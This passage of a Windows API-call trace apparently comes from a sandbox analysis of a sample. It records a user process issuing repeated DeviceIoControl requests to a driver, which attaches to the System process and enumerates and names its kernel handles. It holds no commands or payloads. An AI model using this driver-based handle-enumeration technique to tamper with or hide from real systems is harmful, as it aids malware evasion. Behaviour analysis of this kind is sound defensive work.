Object=0xffffd000b1b8e378*=0xffffe000698816c0, HandleInformation=0x0) returned 0x0 [0256.711] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.711] PsReleaseProcessExitSynchronization () returned 0x2 [0256.711] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa5e [0256.711] ObQueryNameString (in: Object=0xffffe000698816c0, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.711] ObfDereferenceObject (Object=0xffffe000698816c0) returned 0x8000 [0256.711] IoCompleteRequest () returned 0x0 [0256.711] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0256.711] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.711] PsAcquireProcessExitSynchronization () returned 0x0 [0256.711] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.711] ObReferenceObjectByHandle (in: Handle=0xffffffff80000594, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697d9db0, HandleInformation=0x0) returned 0x0 [0256.711] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.711] PsReleaseProcessExitSynchronization () returned 0x2 [0256.711] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa5d [0256.711] ObQueryNameString (in: Object=0xffffe000697d9db0, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.711] ObfDereferenceObject (Object=0xffffe000697d9db0) returned 0x7ffe [0256.712] IoCompleteRequest () returned 0x0 [0256.712] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x38, lpOverlapped=0x0) returned 1 [0256.712] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.712] PsAcquireProcessExitSynchronization () returned 0x0 [0256.712] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.712] ObReferenceObjectByHandle (in: Handle=0xffffffff80000598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069847db0, HandleInformation=0x0) returned 0x0 [0256.712] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.712] PsReleaseProcessExitSynchronization () returned 0x2 [0256.712] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa5c [0256.712] ObQueryNameString (in: Object=0xffffe00069847db0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.712] ObfDereferenceObject (Object=0xffffe00069847db0) returned 0x8000 [0256.712] IoCompleteRequest () returned 0x0 [0256.712] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xf2, lpOverlapped=0x0) returned 1 [0256.712] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.712] PsAcquireProcessExitSynchronization () returned 0x0 [0256.712] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.712] ObReferenceObjectByHandle (in: Handle=0xffffffff800005a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069847370, HandleInformation=0x0) returned 0x0 [0256.712] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.712] PsReleaseProcessExitSynchronization () returned 0x2 [0256.712] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa5b [0256.712] ObQueryNameString (in: Object=0xffffe00069847370, ObjectNameInfo=0xffffe0006a6c07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6c07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.712] ObfDereferenceObject (Object=0xffffe00069847370) returned 0x8000 [0256.712] IoCompleteRequest () returned 0x0 [0256.712] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x98, lpOverlapped=0x0) returned 1 [0256.712] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.712] PsAcquireProcessExitSynchronization () returned 0x0 [0256.712] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.712] ObReferenceObjectByHandle (in: Handle=0xffffffff800005a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069846cd0, HandleInformation=0x0) returned 0x0 [0256.712] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.712] PsReleaseProcessExitSynchronization () returned 0x2 [0256.712] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa5a [0256.712] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2cb4c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a2cb4c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.712] ObfDereferenceObject (Object=0xffffe00069846cd0) returned 0x7f1b [0256.712] IoCompleteRequest () returned 0x0 [0256.712] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xa2, lpOverlapped=0x0) returned 1 [0256.712] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.712] PsAcquireProcessExitSynchronization () returned 0x0 [0256.712] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.713] ObReferenceObjectByHandle (in: Handle=0xffffffff800005a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067ebe870, HandleInformation=0x0) returned 0x0 [0256.713] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.713] PsReleaseProcessExitSynchronization () returned 0x2 [0256.713] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa59 [0256.713] ObQueryNameString (in: Object=0xffffe00067ebe870, ObjectNameInfo=0xffffe000685c67c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000685c67c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.713] ObfDereferenceObject (Object=0xffffe00067ebe870) returned 0x7ffb [0256.713] IoCompleteRequest () returned 0x0 [0256.713] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xa2, lpOverlapped=0x0) returned 1 [0256.713] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.713] PsAcquireProcessExitSynchronization () returned 0x0 [0256.713] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.713] ObReferenceObjectByHandle (in: Handle=0xffffffff800005ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069845ad0, HandleInformation=0x0) returned 0x0 [0256.713] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.713] PsReleaseProcessExitSynchronization () returned 0x2 [0256.713] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa58 [0256.713] ObQueryNameString (in: Object=0xffffe00069845ad0, ObjectNameInfo=0xffffe0006a5164c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a5164c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.713] ObfDereferenceObject (Object=0xffffe00069845ad0) returned 0x7ffe [0256.713] IoCompleteRequest () returned 0x0 [0256.713] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x13c, lpOverlapped=0x0) returned 1 [0256.713] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.713] PsAcquireProcessExitSynchronization () returned 0x0 [0256.713] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.713] ObReferenceObjectByHandle (in: Handle=0xffffffff800005b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006984ee20, HandleInformation=0x0) returned 0x0 [0256.713] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.713] PsReleaseProcessExitSynchronization () returned 0x2 [0256.713] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa57 [0256.713] ObQueryNameString (in: Object=0xffffe0006984ee20, ObjectNameInfo=0xffffe0006a43b7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a43b7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.713] ObfDereferenceObject (Object=0xffffe0006984ee20) returned 0x8000 [0256.713] IoCompleteRequest () returned 0x0 [0256.713] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x13c, lpOverlapped=0x0) returned 1 [0256.713] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.713] PsAcquireProcessExitSynchronization () returned 0x0 [0256.713] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.713] ObReferenceObjectByHandle (in: Handle=0xffffffff800005b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006984aca0, HandleInformation=0x0) returned 0x0 [0256.713] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.713] PsReleaseProcessExitSynchronization () returned 0x2 [0256.713] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa56 [0256.713] ObQueryNameString (in: Object=0xffffe0006984aca0, ObjectNameInfo=0xffffe0006a604704, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a604704, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.713] ObfDereferenceObject (Object=0xffffe0006984aca0) returned 0x8000 [0256.714] IoCompleteRequest () returned 0x0 [0256.714] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0256.714] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.714] PsAcquireProcessExitSynchronization () returned 0x0 [0256.714] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.714] ObReferenceObjectByHandle (in: Handle=0xffffffff800005bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006953a8e0, HandleInformation=0x0) returned 0x0 [0256.714] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.714] PsReleaseProcessExitSynchronization () returned 0x2 [0256.714] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa55 [0256.714] ObQueryNameString (in: Object=0xffffe0006953a8e0, ObjectNameInfo=0xffffe000690237c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690237c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.714] ObfDereferenceObject (Object=0xffffe0006953a8e0) returned 0x7fff [0256.714] IoCompleteRequest () returned 0x0 [0256.714] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0256.714] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.714] PsAcquireProcessExitSynchronization () returned 0x0 [0256.714] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.714] ObReferenceObjectByHandle (in: Handle=0xffffffff800005c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069715c90, HandleInformation=0x0) returned 0x0 [0256.714] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.714] PsReleaseProcessExitSynchronization () returned 0x2 [0256.714] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa54 [0256.714] ObQueryNameString (in: Object=0xffffe00069715c90, ObjectNameInfo=0xffffe0006a9af044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a9af044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.714] ObfDereferenceObject (Object=0xffffe00069715c90) returned 0x8000 [0256.714] IoCompleteRequest () returned 0x0 [0256.714] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xc2, lpOverlapped=0x0) returned 1 [0256.714] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.714] PsAcquireProcessExitSynchronization () returned 0x0 [0256.714] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.714] ObReferenceObjectByHandle (in: Handle=0xffffffff800005fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000804d4cc0, HandleInformation=0x0) returned 0x0 [0256.714] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.714] PsReleaseProcessExitSynchronization () returned 0x2 [0256.714] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa53 [0256.714] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.714] ObfDereferenceObject (Object=0xffffe000804d4cc0) returned 0x8009 [0256.714] IoCompleteRequest () returned 0x0 [0256.714] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.022] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.022] PsAcquireProcessExitSynchronization () returned 0x0 [0258.022] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.022] ObReferenceObjectByHandle (in: Handle=0xffffffff8000065c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.022] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.023] PsReleaseProcessExitSynchronization () returned 0x2 [0258.023] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa53 [0258.023] IoCompleteRequest () returned 0x0 [0258.023] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.023] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.023] PsAcquireProcessExitSynchronization () returned 0x0 [0258.023] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.023] ObReferenceObjectByHandle (in: Handle=0xffffffff80000688, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.023] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.023] PsReleaseProcessExitSynchronization () returned 0x2 [0258.023] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa52 [0258.023] IoCompleteRequest () returned 0x0 [0258.023] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.023] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.023] PsAcquireProcessExitSynchronization () returned 0x0 [0258.023] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.023] ObReferenceObjectByHandle (in: Handle=0xffffffff8000068c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069043370, HandleInformation=0x0) returned 0x0 [0258.023] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.023] PsReleaseProcessExitSynchronization () returned 0x2 [0258.023] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa51 [0258.023] ObQueryNameString (in: Object=0xffffe00069043370, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.023] ObfDereferenceObject (Object=0xffffe00069043370) returned 0x8000 [0258.023] IoCompleteRequest () returned 0x0 [0258.023] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.023] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.023] PsAcquireProcessExitSynchronization () returned 0x0 [0258.023] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.023] ObReferenceObjectByHandle (in: Handle=0xffffffff80000690, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000690b85e0, HandleInformation=0x0) returned 0x0 [0258.023] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.023] PsReleaseProcessExitSynchronization () returned 0x2 [0258.023] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa50 [0258.023] ObQueryNameString (in: Object=0xffffe000690b85e0, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.023] ObfDereferenceObject (Object=0xffffe000690b85e0) returned 0x8000 [0258.023] IoCompleteRequest () returned 0x0 [0258.024] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.024] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.024] PsAcquireProcessExitSynchronization () returned 0x0 [0258.024] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.024] ObReferenceObjectByHandle (in: Handle=0xffffffff80000698, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069043f20, HandleInformation=0x0) returned 0x0 [0258.024] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.024] PsReleaseProcessExitSynchronization () returned 0x2 [0258.024] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa4f [0258.024] ObQueryNameString (in: Object=0xffffe00069043f20, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.024] ObfDereferenceObject (Object=0xffffe00069043f20) returned 0x8000 [0258.024] IoCompleteRequest () returned 0x0 [0258.024] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.024] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.024] PsAcquireProcessExitSynchronization () returned 0x0 [0258.024] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.024] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006903a900, HandleInformation=0x0) returned 0x0 [0258.024] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.024] PsReleaseProcessExitSynchronization () returned 0x2 [0258.024] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa4e [0258.024] ObQueryNameString (in: Object=0xffffe0006903a900, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.024] ObfDereferenceObject (Object=0xffffe0006903a900) returned 0x8000 [0258.024] IoCompleteRequest () returned 0x0 [0258.024] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.024] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.024] PsAcquireProcessExitSynchronization () returned 0x0 [0258.024] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.025] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069038560, HandleInformation=0x0) returned 0x0 [0258.025] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.025] PsReleaseProcessExitSynchronization () returned 0x2 [0258.025] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa4d [0258.025] ObQueryNameString (in: Object=0xffffe00069038560, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: 